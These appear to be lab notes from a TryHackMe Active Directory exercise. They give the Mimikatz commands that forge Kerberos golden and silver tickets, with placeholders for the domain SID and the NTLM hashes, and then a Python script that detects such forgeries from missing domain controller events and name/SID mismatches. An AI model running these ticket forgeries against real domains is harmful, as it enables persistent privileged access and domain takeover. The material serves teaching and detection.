Ticket

Golden Ticket Attack

Step 1: Get Domain SID

Use PowerShell to retrieve the domain SID:

Get-ADDomain

Step 2: Generate a Golden Ticket

Run the following Mimikatz command:

mimikatz # kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM hash of KRBTGT account> /endin:600 /renewmax:10080 /ptt

Silver Ticket Attack

Step 1: Generate a Silver Ticket

Run the following Mimikatz command:

mimikatz # kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
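
A defender-side view of the two forgeries above, as an added example that is not part of the original page: a golden ticket's TGT and a silver ticket's service ticket are never issued by the DC, so the matching 4768 or 4769 event is missing, and the made-up account name does not match the SID it claims. The simplified event fields, the placeholder domain SID and all sample records are constructed assumptions; 4624 records are assumed to be Kerberos network logons.

```python
from datetime import datetime, timedelta

# Assumptions: events are already parsed into dicts with simplified field names;
# DOMAIN_SID is a placeholder and every record below is constructed sample data.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
DIRECTORY = {f"{DOMAIN_SID}-500": "Administrator", f"{DOMAIN_SID}-1104": "alice"}
WINDOW = timedelta(hours=10)  # default AD maximum ticket lifetime (600 minutes)

def ev(eid, ts, user, rid=None, host=None):
    """Build one simplified event record."""
    sid = f"{DOMAIN_SID}-{rid}" if rid else None
    return {"id": eid, "time": datetime.fromisoformat(ts),
            "user": user, "sid": sid, "host": host}

EVENTS = [
    ev(4768, "2024-05-01T08:00:00", "alice"),                # TGT issued by the DC
    ev(4769, "2024-05-01T08:01:00", "alice", host="fs01"),   # service ticket issued
    ev(4624, "2024-05-01T08:01:05", "alice", 1104, "fs01"),  # logon on fs01
    ev(4769, "2024-05-01T09:00:00", "ReallyNotALegitAccount", host="fs01"),
    ev(4624, "2024-05-01T09:00:05", "ReallyNotALegitAccount", 500, "fs01"),
    ev(4624, "2024-05-01T09:30:00", "StillNotALegitAccount", 500, "fs02"),
]

def seen_before(events, e, eid, match_host=False):
    """True if an `eid` event for the same user precedes `e` within WINDOW."""
    return any(
        p["id"] == eid and p["user"].lower() == e["user"].lower()
        and timedelta(0) <= e["time"] - p["time"] <= WINDOW
        and (not match_host or p["host"] == e["host"])
        for p in events)

def suspicious(events, directory):
    """Return (user, host, reason) tuples for events that fit a forged ticket."""
    findings = []
    for e in events:
        if e["id"] == 4624:
            # The name in the ticket should be the directory's name for that SID.
            if directory.get(e["sid"], "").lower() != e["user"].lower():
                findings.append((e["user"], e["host"], "name does not match SID in directory"))
            # A silver ticket never touches the DC, so no 4769 precedes the logon.
            if not seen_before(events, e, 4769, match_host=True):
                findings.append((e["user"], e["host"], "logon without a DC-issued service ticket"))
        # A golden ticket is a TGT the DC never issued, so no 4768 precedes the 4769.
        elif e["id"] == 4769 and not seen_before(events, e, 4768):
            findings.append((e["user"], e["host"], "service ticket request without a TGT request"))
    return findings

if __name__ == "__main__":
    for finding in suspicious(EVENTS, DIRECTORY):
        print(*finding, sep=" | ")
```

The `/endin:600` and `/renewmax:10080` values in the golden ticket command equal the default AD ticket lifetime and renewal limits, so the checks here rely on missing DC events and name/SID mismatch rather than on ticket lifetime.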
